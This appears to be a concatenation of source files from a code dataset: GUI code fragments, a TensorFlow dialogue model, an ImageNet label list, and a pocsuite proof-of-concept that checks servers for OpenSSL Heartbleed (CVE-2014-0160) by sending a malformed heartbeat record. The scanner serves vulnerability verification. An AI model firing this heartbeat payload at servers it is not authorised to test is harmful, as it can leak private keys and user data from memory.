oneGuiDay.updateSelected(True)
else:
oneGuiDay.updateSelected(False)
def clearSelectedDay(self):
for oneGuiDay in self.guiDays:
oneGuiDay.updateSelected(False)
def filterChanged(self):
newFilter = self.filterList.getSelectedIndex()
for guiDay in self.guiDays:
guiDay.changeFilter(newFilter)
|
[
"s0mberdemise@protonmail.com"
] |
s0mberdemise@protonmail.com
|
dd946e558805e70e2ba90c922d602e5869cd007a
|
7c0dd68e474c345d022b9d879a31cc82e0b438cf
|
/openssl_heartbleed.py
|
75e7fc2cafa0424e450d6970247f51e9629ac53e
|
[] |
no_license
|
liyanghack/-
|
8de6e2be931faea680b9c1f8e35a2a0c8cd5bc3a
|
9abab66543e19a4b444a79f2ee790b1eafaacc01
|
refs/heads/master
| 2021-02-22T04:40:08.921551
| 2020-03-13T11:10:13
| 2020-03-13T11:10:13
| 245,369,458
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,072
|
py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
from pocsuite.api.poc import Output, POCBase
from pocsuite.api.poc import register
from pocsuite.thirdparty.guanxing import parse_ip_port
import struct
import socket
import time
import select
socket.setdefaulttimeout(5)
def request2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
client_key_exchange = request2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
malformed_heartbeat = request2bin('''
18 03 02 00 03
01 40 00
''')
def get_msg_from_socket(some_socket, msg_length, time_out=5):
end_time = time.time() + time_out
received_data = ''
remaining_msg = msg_length
while remaining_msg > 0:
read_time = end_time - time.time()
if read_time < 0:
return None
read_socket, write_socket, error_socket = select.select([some_socket], [], [], time_out)
if some_socket in read_socket:
data = some_socket.recv(remaining_msg)
if not data:
return None
else:
received_data += data
remaining_msg -= len(data)
else:
pass
return received_data
def recv_msg(a_socket):
header = get_msg_from_socket(a_socket, 5)
if header is None:
return None, None, None
message_type, message_version, message_length = struct.unpack('>BHH', header)
message_payload = get_msg_from_socket(a_socket, message_length, 10)
if message_payload is None:
return None, None, None
return message_type, message_version, message_payload
def send_n_catch_heartbeat(our_socket):
our_socket.send(malformed_heartbeat)
while True:
content_type, content_version, content_payload = recv_msg(our_socket)
if content_type is None:
return False
if content_type == 24:
return True
if content_type == 21:
return False
def main(rhost):
global port
ip,port = parse_ip_port(rhost)
# 预定义默认端口
if not port :
port = 443
local_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_socket.connect((ip, int(port)))
local_socket.send(client_key_exchange)
while True:
type, version, payload = recv_msg(local_socket)
if not type:
return
if type == 22 and ord(payload[0]) == 0x0E:
break
local_socket.send(malformed_heartbeat)
return send_n_catch_heartbeat(local_socket)
class TestPOC(POCBase):
vulID = 'DSO-00046'
version = ''
author = 'ly'
vulDate = '2014-04-08'
createDate = '2020-03-09'
updateDate = '2020-03-13'
references = ['https://zh.wikipedia.org/wiki/%E5%BF%83%E8%84%8F%E5%87%BA%E8%A1%80%E6%BC%8F%E6%B4%9E']
name = 'Openssl 1.0.1 内存读取 信息泄露漏洞'
appPowerLink = ''
appName = 'OpenSSL'
appVersion = '1.0.1~1.0.1f, 1.0.2-beta, 1.0.2-beta1'
vulType = 'info-disclosure'
# 漏洞描述
desc = '''
即“心脏出血漏洞”,这项严重缺陷(CVE-2014-0160)的产生是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,从而获取用户信息。
'''
# the sample sites for examine
samples = ['']
install_requires = ['']
cveID = 'CVE-2014-0160'
severity = 'high'
solution = '''
为了解决此漏洞,除了需要安装修复后的软件(OpenSSL动态库及静态使用OpenSSL的二进制文件)之外,还可能要做其他的事。运行中的、依赖于OpenSSL的应用程序仍会使用在内存中的有缺陷OpenSSL代码,直至重新启动,才能堵住漏洞。
此外,即使漏洞本身已经修复,因漏洞受到攻击的系统在保密性、甚至完整性上仍存隐患。为了重新获得保密性和可信度,服务器必须重新生成所有受损的私钥-公钥对,并撤销及替换与之相关的所有证书。一般来说,必须更换所有受到影响的认证资料(例如密码),因为难以确认受漏洞影响的系统是否已被攻击。
'''
taskType = 'app-vul'
def _verify(self):
# print self.url
response = main(self.url)
# print response
return self.parse_attack(response)
def _attack(self):
return self._verify()
def parse_attack(self, response):
output = Output(self)
result = {}
if response:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '%s' % self.url
result['VerifyInfo']['port'] = port
output.success(result)
else:
output.fail('Failed')
return output
register(TestPOC)
|
[
"noreply@github.com"
] |
liyanghack.noreply@github.com
|
2138e45b6ad500c213d7da873af0a2b31989b382
|
eb3395ce39347c6a19821ff9ab224b288f8e83fb
|
/ndm/model_cnn12_bn_att_a_w2targs.py
|
1d7eb52ddb18d34dd3b8b8a9f23e835fb5172ebc
|
[
"Apache-2.0"
] |
permissive
|
oplatek/ndm
|
86e06ac9dc62ff45f5c3ad35b6892d23650f614d
|
d32bd9d685902d9da52b7e7abd286fb5d9c7274a
|
refs/heads/master
| 2021-07-11T02:22:16.570947
| 2016-02-18T11:21:03
| 2016-02-18T11:21:03
| 52,531,623
| 0
| 0
| null | 2016-02-25T14:35:47
| 2016-02-25T14:35:47
| null |
UTF-8
|
Python
| false
| false
| 14,624
|
py
|
#!/usr/bin/env python3
import sys
import tensorflow as tf
from model import ModelW2T, ModelW2TArgs
from tfx.bricks import embedding, dense_to_one_hot, linear, conv2d, multicolumn_embedding, \
glorot_mul, reduce_max, dropout, conv2d_bn, batch_norm_lin, pow_1, softmax_2d
class Model(ModelW2TArgs):
def __init__(self, data, FLAGS):
super(Model, self).__init__(data, FLAGS)
database_column_embedding_size = 8
n_database_columns = len(data.database_columns)
conv_mul = 2
histories_embedding_size = 16
histories_vocabulary_length = len(data.idx2word_history)
history_length = data.train_set['histories'].shape[1]
histories_arguments_embedding_size = 8
histories_arguments_vocabulary_length = len(data.idx2word_history_arguments)
n_histories_arguments = data.train_set['histories_arguments'].shape[1]
action_templates_vocabulary_length = len(data.idx2word_action_template)
action_templates_embedding_size = 8
num_actions_arguments = data.batch_actions_arguments.shape[2]
actions_arguments_vocabulary_length = len(data.idx2word_action_arguments)
with tf.name_scope('data'):
database = tf.Variable(data.database, name='database',
trainable=False)
batch_histories = tf.Variable(data.batch_histories, name='histories',
trainable=False)
batch_histories_arguments = tf.Variable(data.batch_histories_arguments, name='histories_arguments',
trainable=False)
batch_actions_template = tf.Variable(data.batch_actions_template, name='actions',
trainable=False)
batch_action_arguments = tf.Variable(data.batch_actions_arguments, name='actions_arguments',
trainable=False)
histories = tf.gather(batch_histories, self.batch_idx)
histories_arguments = tf.gather(batch_histories_arguments, self.batch_idx)
actions_template = tf.gather(batch_actions_template, self.batch_idx)
actions_arguments = tf.gather(batch_action_arguments, self.batch_idx)
with tf.name_scope('model'):
database_embedding = multicolumn_embedding(
columns=database,
lengths=[len(i2w) for i2w in [data.database_idx2word[column] for column in data.database_columns]],
sizes=[database_column_embedding_size for column in data.database_columns],
# all columns have the same size
name='database_embedding'
)
histories_embedding = embedding(
input=histories,
length=histories_vocabulary_length,
size=histories_embedding_size,
name='histories_embedding'
)
histories_arguments_embedding = embedding(
input=histories_arguments,
length=histories_arguments_vocabulary_length,
size=histories_arguments_embedding_size,
name='histories_arguments_embedding'
)
with tf.name_scope("UtterancesEncoder"):
conv3 = histories_embedding
# conv3 = dropout(conv3, pow_1(self.dropout_keep_prob, 2))
conv3 = conv2d_bn(
input=conv3,
filter=[1, 3, conv3.size, conv3.size * conv_mul],
phase_train=self.phase_train,
name='conv_utt_size_3_layer_1'
)
encoded_utterances = reduce_max(conv3, [2], keep_dims=True, name='encoded_utterances')
with tf.name_scope("HistoryEncoder"):
conv3 = encoded_utterances
conv3 = dropout(conv3, pow_1(self.dropout_keep_prob, 2))
conv3 = conv2d_bn(
input=conv3,
filter=[3, 1, conv3.size, conv3.size * conv_mul],
phase_train=self.phase_train,
name='conv_hist_size_3_layer_1'
)
conv3 = dropout(conv3, pow_1(self.dropout_keep_prob, 2))
conv3 = conv2d_bn(
input=conv3,
filter=[3, 1, conv3.size, conv3.size * conv_mul],
phase_train=self.phase_train,
name='conv_hist_size_3_layer_2'
)
encoded_history = reduce_max(conv3, [1, 2], name='encoded_history')
# print(encoded_history)
with tf.name_scope("DatabaseAttention"):
histories_arguments_embedding = tf.reshape(
histories_arguments_embedding,
[-1, n_histories_arguments * histories_arguments_embedding_size],
name='histories_arguments_embedding'
)
# print(histories_arguments_embedding)
history_predicate = tf.concat(
1,
[encoded_history, histories_arguments_embedding],
name='history_predicate'
)
# print(history_predicate)
att_W_nx = conv3.size + n_histories_arguments * histories_arguments_embedding_size
att_W_ny = n_database_columns * database_column_embedding_size
att_W = tf.get_variable(
name='attention_W',
shape=[att_W_nx, att_W_ny],
initializer=tf.random_uniform_initializer(
-glorot_mul(att_W_nx, att_W_ny),
glorot_mul(att_W_nx, att_W_ny)
),
)
hp_x_att_W = tf.matmul(history_predicate, att_W)
attention_scores = tf.matmul(hp_x_att_W, database_embedding, transpose_b=True)
attention = tf.nn.softmax(attention_scores, name="attention_softmax")
print(attention)
attention_max = tf.reduce_max(attention, reduction_indices=1, keep_dims=True)
attention_min = tf.reduce_min(attention, reduction_indices=1, keep_dims=True)
attention_mean = tf.reduce_mean(attention_scores, reduction_indices=1, keep_dims=True)
attention_feat = tf.concat(1, [attention_max, attention_mean, attention_min], name='attention_feat')
attention_feat_size = 3
# print(attention_feat)
db_result = tf.matmul(attention, database_embedding, name='db_result')
db_result_size = att_W_ny
# print(db_result)
with tf.name_scope("Decoder"):
second_to_last_user_utterance = encoded_utterances[:, history_length - 3, 0, :]
last_system_utterance = encoded_utterances[:, history_length - 2, 0, :]
last_user_utterance = encoded_utterances[:, history_length - 1, 0, :]
dialogue_state = tf.concat(
1,
[
encoded_history,
last_user_utterance,
last_system_utterance,
second_to_last_user_utterance,
attention_feat,
db_result
],
name='dialogue_state'
)
dialogue_state_size = (
conv3.size +
3 * histories_embedding_size * conv_mul +
attention_feat_size +
db_result_size +
0
)
dialogue_state = tf.nn.relu(dialogue_state)
dialogue_state = dropout(dialogue_state, self.dropout_keep_prob)
# action prediction
projection = linear(
input=dialogue_state,
input_size=dialogue_state_size,
output_size=dialogue_state_size,
name='linear_projection_1'
)
projection = batch_norm_lin(projection, dialogue_state_size, self.phase_train,
name='linear_projection_1_bn')
activation = tf.nn.relu(projection)
activation = dropout(activation, self.dropout_keep_prob)
projection = linear(
input=activation,
input_size=dialogue_state_size,
output_size=dialogue_state_size,
name='linear_projection_2'
)
projection = batch_norm_lin(projection, dialogue_state_size, self.phase_train,
name='linear_projection_2_bn')
activation = tf.nn.relu(projection)
activation = dropout(activation, self.dropout_keep_prob)
projection = linear(
input=activation,
input_size=dialogue_state_size,
output_size=action_templates_vocabulary_length,
name='linear_projection_3_predictions_action'
)
self.predictions_action = tf.nn.softmax(projection, name="softmax_output_prediction_action")
# argument prediction
# first encode decoded action template and teh true action template
choice = tf.floor(tf.random_uniform([1], self.use_inputs_prob, 1 + self.use_inputs_prob, tf.float32))
prediction_action_argmax = tf.stop_gradient(tf.argmax(self.predictions_action, 1))
predicted_action_templates_embedding = embedding(
input=prediction_action_argmax,
length=action_templates_vocabulary_length,
size=action_templates_embedding_size,
name='action_templates_embedding'
)
true_action_template_embedding = tf.gather(predicted_action_templates_embedding.embedding_table, actions_template)
predicted_action_templates_embedding = tf.stop_gradient(predicted_action_templates_embedding)
action_templates_embedding = choice * true_action_template_embedding + (1.0 - choice) * predicted_action_templates_embedding
dialogue_state_action_template = tf.concat(
1,
[
dialogue_state,
action_templates_embedding
],
name='dialogue_state_action_template'
)
dialogue_state_action_template_size = (
dialogue_state_size +
action_templates_embedding_size
)
# condition on the dialogue state and the decoded template
projection = linear(
input=dialogue_state_action_template,
input_size=dialogue_state_action_template_size,
output_size=dialogue_state_action_template_size,
name='linear_projection_1_predictions_arguments'
)
projection = batch_norm_lin(projection, dialogue_state_action_template_size, self.phase_train,
name='linear_projection_1_predictions_arguments_bn')
activation = tf.nn.relu(projection)
activation = dropout(activation, self.dropout_keep_prob)
projection = linear(
input=activation,
input_size=dialogue_state_action_template_size,
output_size=dialogue_state_action_template_size,
name='linear_projection_2_predictions_arguments'
)
projection = batch_norm_lin(projection, dialogue_state_action_template_size, self.phase_train,
name='linear_projection_2_predictions_arguments_bn')
activation = tf.nn.relu(projection)
activation = dropout(activation, self.dropout_keep_prob)
projection = linear(
input=activation,
input_size=dialogue_state_action_template_size,
output_size=num_actions_arguments * actions_arguments_vocabulary_length,
name='linear_projection_3_predictions_arguments'
)
self.predictions_arguments = softmax_2d(
input=projection,
n_classifiers=num_actions_arguments,
n_classes=actions_arguments_vocabulary_length,
name="softmax_2d_predictions_arguments")
if FLAGS.print_variables:
for v in tf.trainable_variables():
print(v.name)
with tf.name_scope('loss'):
one_hot_labels_action = dense_to_one_hot(actions_template, action_templates_vocabulary_length)
one_hot_labels_arguments = dense_to_one_hot(actions_arguments, actions_arguments_vocabulary_length)
loss_action = tf.reduce_mean(
- one_hot_labels_action * tf.log(tf.clip_by_value(self.predictions_action, 1e-10, 1.0)),
name='loss'
)
loss_arguments = tf.reduce_mean(
- one_hot_labels_arguments * tf.log(tf.clip_by_value(self.predictions_arguments, 1e-10, 1.0)),
name='loss'
)
self.loss = (loss_action + loss_arguments)/2
tf.scalar_summary('loss', self.loss)
with tf.name_scope('accuracy'):
correct_prediction_action = tf.equal(
tf.argmax(one_hot_labels_action, 1),
tf.argmax(self.predictions_action, 1)
)
self.accuracy_action = tf.reduce_mean(tf.cast(correct_prediction_action, 'float'))
tf.scalar_summary('accuracy_action', self.accuracy_action)
correct_prediction_arguments = tf.equal(tf.argmax(one_hot_labels_arguments, 2),
tf.argmax(self.predictions_arguments, 2))
self.accuracy_arguments = tf.reduce_mean(tf.cast(correct_prediction_arguments, 'float'))
tf.scalar_summary('accuracy_arguments', self.accuracy_arguments)
self.accuracy = (self.accuracy_action + self.accuracy_arguments)/2
tf.scalar_summary('accuracy', self.accuracy)
|
[
"filip.juricicek@gmail.com"
] |
filip.juricicek@gmail.com
|
6b94ccf36b537b20b948dc0a0e5c41ed19240a20
|
b7a9307465e4107356a9bc518a5b6eea6491ffab
|
/Model_Training/Manual_model/vgg_labels.py
|
5268dfb8bf8c2ca81ff307a268a255abe5e28a9e
|
[] |
no_license
|
Tunoc/pythonexam
|
b2378835b5bcbbf1f892b6838cfc0cc856bcb7b1
|
d7a28874edfaa23396ddfdbd77bce9c7fcfa240f
|
refs/heads/main
| 2023-02-04T05:12:52.697491
| 2020-12-27T19:27:06
| 2020-12-27T19:27:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 30,578
|
py
|
translate = {
0: 'tench, Tinca tinca',
1: 'goldfish, Carassius auratus',
2: 'great white shark, white shark, man-eater, man-eating shark, Carcharodon carcharias',
3: 'tiger shark, Galeocerdo cuvieri',
4: 'hammerhead, hammerhead shark',
5: 'electric ray, crampfish, numbfish, torpedo',
6: 'stingray',
7: 'cock',
8: 'hen',
9: 'ostrich, Struthio camelus',
10: 'brambling, Fringilla montifringilla',
11: 'goldfinch, Carduelis carduelis',
12: 'house finch, linnet, Carpodacus mexicanus',
13: 'junco, snowbird',
14: 'indigo bunting, indigo finch, indigo bird, Passerina cyanea',
15: 'robin, American robin, Turdus migratorius',
16: 'bulbul',
17: 'jay',
18: 'magpie',
19: 'chickadee',
20: 'water ouzel, dipper',
21: 'kite',
22: 'bald eagle, American eagle, Haliaeetus leucocephalus',
23: 'vulture',
24: 'great grey owl, great gray owl, Strix nebulosa',
25: 'European fire salamander, Salamandra salamandra',
26: 'common newt, Triturus vulgaris',
27: 'eft',
28: 'spotted salamander, Ambystoma maculatum',
29: 'axolotl, mud puppy, Ambystoma mexicanum',
30: 'bullfrog, Rana catesbeiana',
31: 'tree frog, tree-frog',
32: 'tailed frog, bell toad, ribbed toad, tailed toad, Ascaphus trui',
33: 'loggerhead, loggerhead turtle, Caretta caretta',
34: 'leatherback turtle, leatherback, leathery turtle, Dermochelys coriacea',
35: 'mud turtle',
36: 'terrapin',
37: 'box turtle, box tortoise',
38: 'banded gecko',
39: 'common iguana, iguana, Iguana iguana',
40: 'American chameleon, anole, Anolis carolinensis',
41: 'whiptail, whiptail lizard',
42: 'agama',
43: 'frilled lizard, Chlamydosaurus kingi',
44: 'alligator lizard',
45: 'Gila monster, Heloderma suspectum',
46: 'green lizard, Lacerta viridis',
47: 'African chameleon, Chamaeleo chamaeleon',
48: 'Komodo dragon, Komodo lizard, dragon lizard, giant lizard, Varanus komodoensis',
49: 'African crocodile, Nile crocodile, Crocodylus niloticus',
50: 'American alligator, Alligator mississipiensis',
51: 'triceratops',
52: 'thunder snake, worm snake, Carphophis amoenus',
53: 'ringneck snake, ring-necked snake, ring snake',
54: 'hognose snake, puff adder, sand viper',
55: 'green snake, grass snake',
56: 'king snake, kingsnake',
57: 'garter snake, grass snake',
58: 'water snake',
59: 'vine snake',
60: 'night snake, Hypsiglena torquata',
61: 'boa constrictor, Constrictor constrictor',
62: 'rock python, rock snake, Python sebae',
63: 'Indian cobra, Naja naja',
64: 'green mamba',
65: 'sea snake',
66: 'horned viper, cerastes, sand viper, horned asp, Cerastes cornutus',
67: 'diamondback, diamondback rattlesnake, Crotalus adamanteus',
68: 'sidewinder, horned rattlesnake, Crotalus cerastes',
69: 'trilobite',
70: 'harvestman, daddy longlegs, Phalangium opilio',
71: 'scorpion',
72: 'black and gold garden spider, Argiope aurantia',
73: 'barn spider, Araneus cavaticus',
74: 'garden spider, Aranea diademata',
75: 'black widow, Latrodectus mactans',
76: 'tarantula',
77: 'wolf spider, hunting spider',
78: 'tick',
79: 'centipede',
80: 'black grouse',
81: 'ptarmigan',
82: 'ruffed grouse, partridge, Bonasa umbellus',
83: 'prairie chicken, prairie grouse, prairie fowl',
84: 'peacock',
85: 'quail',
86: 'partridge',
87: 'African grey, African gray, Psittacus erithacus',
88: 'macaw',
89: 'sulphur-crested cockatoo, Kakatoe galerita, Cacatua galerita',
90: 'lorikeet',
91: 'coucal',
92: 'bee eater',
93: 'hornbill',
94: 'hummingbird',
95: 'jacamar',
96: 'toucan',
97: 'drake',
98: 'red-breasted merganser, Mergus serrator',
99: 'goose',
100: 'black swan, Cygnus atratus',
101: 'tusker',
102: 'echidna, spiny anteater, anteater',
103: 'platypus, duckbill, duckbilled platypus, duck-billed platypus, Ornithorhynchus anatinus',
104: 'wallaby, brush kangaroo',
105: 'koala, koala bear, kangaroo bear, native bear, Phascolarctos cinereus',
106: 'wombat',
107: 'jellyfish',
108: 'sea anemone, anemone',
109: 'brain coral',
110: 'flatworm, platyhelminth',
111: 'nematode, nematode worm, roundworm',
112: 'conch',
113: 'snail',
114: 'slug',
115: 'sea slug, nudibranch',
116: 'chiton, coat-of-mail shell, sea cradle, polyplacophore',
117: 'chambered nautilus, pearly nautilus, nautilus',
118: 'Dungeness crab, Cancer magister',
119: 'rock crab, Cancer irroratus',
120: 'fiddler crab',
121: 'king crab, Alaska crab, Alaskan king crab, Alaska king crab, Paralithodes camtschatica',
122: 'American lobster, Northern lobster, Maine lobster, Homarus americanus',
123: 'spiny lobster, langouste, rock lobster, crawfish, crayfish, sea crawfish',
124: 'crayfish, crawfish, crawdad, crawdaddy',
125: 'hermit crab',
126: 'isopod',
127: 'white stork, Ciconia ciconia',
128: 'black stork, Ciconia nigra',
129: 'spoonbill',
130: 'flamingo',
131: 'little blue heron, Egretta caerulea',
132: 'American egret, great white heron, Egretta albus',
133: 'bittern',
134: 'crane',
135: 'limpkin, Aramus pictus',
136: 'European gallinule, Porphyrio porphyrio',
137: 'American coot, marsh hen, mud hen, water hen, Fulica americana',
138: 'bustard',
139: 'ruddy turnstone, Arenaria interpres',
140: 'red-backed sandpiper, dunlin, Erolia alpina',
141: 'redshank, Tringa totanus',
142: 'dowitcher',
143: 'oystercatcher, oyster catcher',
144: 'pelican',
145: 'king penguin, Aptenodytes patagonica',
146: 'albatross, mollymawk',
147: 'grey whale, gray whale, devilfish, Eschrichtius gibbosus, Eschrichtius robustus',
148: 'killer whale, killer, orca, grampus, sea wolf, Orcinus orca',
149: 'dugong, Dugong dugon',
150: 'sea lion',
151: 'Chihuahua',
152: 'Japanese spaniel',
153: 'Maltese dog, Maltese terrier, Maltese',
154: 'Pekinese, Pekingese, Peke',
155: 'Shih-Tzu',
156: 'Blenheim spaniel',
157: 'papillon',
158: 'toy terrier',
159: 'Rhodesian ridgeback',
160: 'Afghan hound, Afghan',
161: 'basset, basset hound',
162: 'beagle',
163: 'bloodhound, sleuthhound',
164: 'bluetick',
165: 'black-and-tan coonhound',
166: 'Walker hound, Walker foxhound',
167: 'English foxhound',
168: 'redbone',
169: 'borzoi, Russian wolfhound',
170: 'Irish wolfhound',
171: 'Italian greyhound',
172: 'whippet',
173: 'Ibizan hound, Ibizan Podenco',
174: 'Norwegian elkhound, elkhound',
175: 'otterhound, otter hound',
176: 'Saluki, gazelle hound',
177: 'Scottish deerhound, deerhound',
178: 'Weimaraner',
179: 'Staffordshire bullterrier, Staffordshire bull terrier',
180: 'American Staffordshire terrier, Staffordshire terrier, American pit bull terrier, pit bull terrier',
181: 'Bedlington terrier',
182: 'Border terrier',
183: 'Kerry blue terrier',
184: 'Irish terrier',
185: 'Norfolk terrier',
186: 'Norwich terrier',
187: 'Yorkshire terrier',
188: 'wire-haired fox terrier',
189: 'Lakeland terrier',
190: 'Sealyham terrier, Sealyham',
191: 'Airedale, Airedale terrier',
192: 'cairn, cairn terrier',
193: 'Australian terrier',
194: 'Dandie Dinmont, Dandie Dinmont terrier',
195: 'Boston bull, Boston terrier',
196: 'miniature schnauzer',
197: 'giant schnauzer',
198: 'standard schnauzer',
199: 'Scotch terrier, Scottish terrier, Scottie',
200: 'Tibetan terrier, chrysanthemum dog',
201: 'silky terrier, Sydney silky',
202: 'soft-coated wheaten terrier',
203: 'West Highland white terrier',
204: 'Lhasa, Lhasa apso',
205: 'flat-coated retriever',
206: 'curly-coated retriever',
207: 'golden retriever',
208: 'Labrador retriever',
209: 'Chesapeake Bay retriever',
210: 'German short-haired pointer',
211: 'vizsla, Hungarian pointer',
212: 'English setter',
213: 'Irish setter, red setter',
214: 'Gordon setter',
215: 'Brittany spaniel',
216: 'clumber, clumber spaniel',
217: 'English springer, English springer spaniel',
218: 'Welsh springer spaniel',
219: 'cocker spaniel, English cocker spaniel, cocker',
220: 'Sussex spaniel',
221: 'Irish water spaniel',
222: 'kuvasz',
223: 'schipperke',
224: 'groenendael',
225: 'malinois',
226: 'briard',
227: 'kelpie',
228: 'komondor',
229: 'Old English sheepdog, bobtail',
230: 'Shetland sheepdog, Shetland sheep dog, Shetland',
231: 'collie',
232: 'Border collie',
233: 'Bouvier des Flandres, Bouviers des Flandres',
234: 'Rottweiler',
235: 'German shepherd, German shepherd dog, German police dog, alsatian',
236: 'Doberman, Doberman pinscher',
237: 'miniature pinscher',
238: 'Greater Swiss Mountain dog',
239: 'Bernese mountain dog',
240: 'Appenzeller',
241: 'EntleBucher',
242: 'boxer',
243: 'bull mastiff',
244: 'Tibetan mastiff',
245: 'French bulldog',
246: 'Great Dane',
247: 'Saint Bernard, St Bernard',
248: 'Eskimo dog, husky',
249: 'malamute, malemute, Alaskan malamute',
250: 'Siberian husky',
251: 'dalmatian, coach dog, carriage dog',
252: 'affenpinscher, monkey pinscher, monkey dog',
253: 'basenji',
254: 'pug, pug-dog',
255: 'Leonberg',
256: 'Newfoundland, Newfoundland dog',
257: 'Great Pyrenees',
258: 'Samoyed, Samoyede',
259: 'Pomeranian',
260: 'chow, chow chow',
261: 'keeshond',
262: 'Brabancon griffon',
263: 'Pembroke, Pembroke Welsh corgi',
264: 'Cardigan, Cardigan Welsh corgi',
265: 'toy poodle',
266: 'miniature poodle',
267: 'standard poodle',
268: 'Mexican hairless',
269: 'timber wolf, grey wolf, gray wolf, Canis lupus',
270: 'white wolf, Arctic wolf, Canis lupus tundrarum',
271: 'red wolf, maned wolf, Canis rufus, Canis niger',
272: 'coyote, prairie wolf, brush wolf, Canis latrans',
273: 'dingo, warrigal, warragal, Canis dingo',
274: 'dhole, Cuon alpinus',
275: 'African hunting dog, hyena dog, Cape hunting dog, Lycaon pictus',
276: 'hyena, hyaena',
277: 'red fox, Vulpes vulpes',
278: 'kit fox, Vulpes macrotis',
279: 'Arctic fox, white fox, Alopex lagopus',
280: 'grey fox, gray fox, Urocyon cinereoargenteus',
281: 'tabby, tabby cat',
282: 'tiger cat',
283: 'Persian cat',
284: 'Siamese cat, Siamese',
285: 'Egyptian cat',
286: 'cougar, puma, catamount, mountain lion, painter, panther, Felis concolor',
287: 'lynx, catamount',
288: 'leopard, Panthera pardus',
289: 'snow leopard, ounce, Panthera uncia',
290: 'jaguar, panther, Panthera onca, Felis onca',
291: 'lion, king of beasts, Panthera leo',
292: 'tiger, Panthera tigris',
293: 'cheetah, chetah, Acinonyx jubatus',
294: 'brown bear, bruin, Ursus arctos',
295: 'American black bear, black bear, Ursus americanus, Euarctos americanus',
296: 'ice bear, polar bear, Ursus Maritimus, Thalarctos maritimus',
297: 'sloth bear, Melursus ursinus, Ursus ursinus',
298: 'mongoose',
299: 'meerkat, mierkat',
300: 'tiger beetle',
301: 'ladybug, ladybeetle, lady beetle, ladybird, ladybird beetle',
302: 'ground beetle, carabid beetle',
303: 'long-horned beetle, longicorn, longicorn beetle',
304: 'leaf beetle, chrysomelid',
305: 'dung beetle',
306: 'rhinoceros beetle',
307: 'weevil',
308: 'fly',
309: 'bee',
310: 'ant, emmet, pismire',
311: 'grasshopper, hopper',
312: 'cricket',
313: 'walking stick, walkingstick, stick insect',
314: 'cockroach, roach',
315: 'mantis, mantid',
316: 'cicada, cicala',
317: 'leafhopper',
318: 'lacewing, lacewing fly',
319: "dragonfly, darning needle, devil's darning needle, sewing needle, snake feeder, snake doctor, mosquito hawk, skeeter hawk",
320: 'damselfly',
321: 'admiral',
322: 'ringlet, ringlet butterfly',
323: 'monarch, monarch butterfly, milkweed butterfly, Danaus plexippus',
324: 'cabbage butterfly',
325: 'sulphur butterfly, sulfur butterfly',
326: 'lycaenid, lycaenid butterfly',
327: 'starfish, sea star',
328: 'sea urchin',
329: 'sea cucumber, holothurian',
330: 'wood rabbit, cottontail, cottontail rabbit',
331: 'hare',
332: 'Angora, Angora rabbit',
333: 'hamster',
334: 'porcupine, hedgehog',
335: 'fox squirrel, eastern fox squirrel, Sciurus niger',
336: 'marmot',
337: 'beaver',
338: 'guinea pig, Cavia cobaya',
339: 'sorrel',
340: 'zebra',
341: 'hog, pig, grunter, squealer, Sus scrofa',
342: 'wild boar, boar, Sus scrofa',
343: 'warthog',
344: 'hippopotamus, hippo, river horse, Hippopotamus amphibius',
345: 'ox',
346: 'water buffalo, water ox, Asiatic buffalo, Bubalus bubalis',
347: 'bison',
348: 'ram, tup',
349: 'bighorn, bighorn sheep, cimarron, Rocky Mountain bighorn, Rocky Mountain sheep, Ovis canadensis',
350: 'ibex, Capra ibex',
351: 'hartebeest',
352: 'impala, Aepyceros melampus',
353: 'gazelle',
354: 'Arabian camel, dromedary, Camelus dromedarius',
355: 'llama',
356: 'weasel',
357: 'mink',
358: 'polecat, fitch, foulmart, foumart, Mustela putorius',
359: 'black-footed ferret, ferret, Mustela nigripes',
360: 'otter',
361: 'skunk, polecat, wood pussy',
362: 'badger',
363: 'armadillo',
364: 'three-toed sloth, ai, Bradypus tridactylus',
365: 'orangutan, orang, orangutang, Pongo pygmaeus',
366: 'gorilla, Gorilla gorilla',
367: 'chimpanzee, chimp, Pan troglodytes',
368: 'gibbon, Hylobates lar',
369: 'siamang, Hylobates syndactylus, Symphalangus syndactylus',
370: 'guenon, guenon monkey',
371: 'patas, hussar monkey, Erythrocebus patas',
372: 'baboon',
373: 'macaque',
374: 'langur',
375: 'colobus, colobus monkey',
376: 'proboscis monkey, Nasalis larvatus',
377: 'marmoset',
378: 'capuchin, ringtail, Cebus capucinus',
379: 'howler monkey, howler',
380: 'titi, titi monkey',
381: 'spider monkey, Ateles geoffroyi',
382: 'squirrel monkey, Saimiri sciureus',
383: 'Madagascar cat, ring-tailed lemur, Lemur catta',
384: 'indri, indris, Indri indri, Indri brevicaudatus',
385: 'Indian elephant, Elephas maximus',
386: 'African elephant, Loxodonta africana',
387: 'lesser panda, red panda, panda, bear cat, cat bear, Ailurus fulgens',
388: 'giant panda, panda, panda bear, coon bear, Ailuropoda melanoleuca',
389: 'barracouta, snoek',
390: 'eel',
391: 'coho, cohoe, coho salmon, blue jack, silver salmon, Oncorhynchus kisutch',
392: 'rock beauty, Holocanthus tricolor',
